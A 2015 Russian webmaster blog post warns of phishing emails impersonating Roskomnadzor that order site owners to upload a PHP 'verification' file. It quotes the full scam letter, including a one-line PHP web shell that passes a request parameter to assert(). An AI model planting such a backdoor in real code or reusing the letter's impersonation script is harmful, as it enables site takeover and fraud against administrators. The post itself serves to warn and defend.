Мошенники рассылают письма от имени Роскомнадзора с требованием "подтвердить права на сайт"

Кейсы - WEBмастерская - Записи в кейсе - WEBмастерская
Опубликовано: 782 дня назад (27 августа 2015)
Пост из кейса: WEBмастерская
В последние дни многие администраторы веб сайтов получают по электронной почте письмо направленное якобы от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор).
В письме, авторы ссылаясь на решение суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015 требуют в трехдневный срок, загрузить в каталог с сайтом php файл со следующим кодом.

Код PHP:
  1. < ?php
  2. /*Подтверждение доменного имени domain.name*/
  3. assert(stripslashes($_REQUEST[roskomnadzor]));
  4. ?>
Что в последующем дает злоумышленникам возможность выполнить произвольный код из переменной roskomnadzor

Полный текст такого письма на примере сайта unila.ru


Цитата:

Уведомление о внесении сайта unila.ru в реестр организаторов распространения информации в сети «Интернет»

от: zapret-info@roskomnadzor.org
кому: support@unila.ru

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени unila.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт unila.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени unila.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

Код PHP:
  1. < ?php
  2. /*Подтверждение доменного имени unila.ru*/
  3. assert(stripslashes($_REQUEST[roskomnadzor]));
  4. ?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: unila.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени unila.ru, следую инструкции указанной выше, то Ваш сайт unila.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.



Мошенники рассылают письма от имени Роскомнадзора с требованием "подтвердить права на сайт"


Первое что бросается в глаза, адрес отправителя содержит в названии домена упоминание о Роскомнадзоре, но явно отличается от официального адреса этой организации. Однако, при переходе по адресу домена, который содержится в адресе отправителя, происходит перенаправление на официальный сайт Роскомнадзора, что способно ввести в заблуждение и сбить с толку.

Итак, если вы получили такое письмо, разумеется не следует выполнять инструкций содержащихся в письме.
Комментарии Роспотребнадзора, по поводу этой рассылки, если они последуют, будут опубликованы позже.
Комментарии (0)

Нет комментариев. Ваш будет первым!

Кейсы - WEBмастерская
УНИЛА РУ 2017

Информационно-развлекательный портал
18+ для лиц старше 18 лет
Контакты: support@unila.ru

Доска объявлений
Объявления о недвижимости
Авто объявления
Объявления о работе
Объявления об услугах
Объявления о знакомстве

Видео портал
Юмор, смешное видео
Интересно и познавательно
Путешествия и туризм
Животные
Кино трейлеры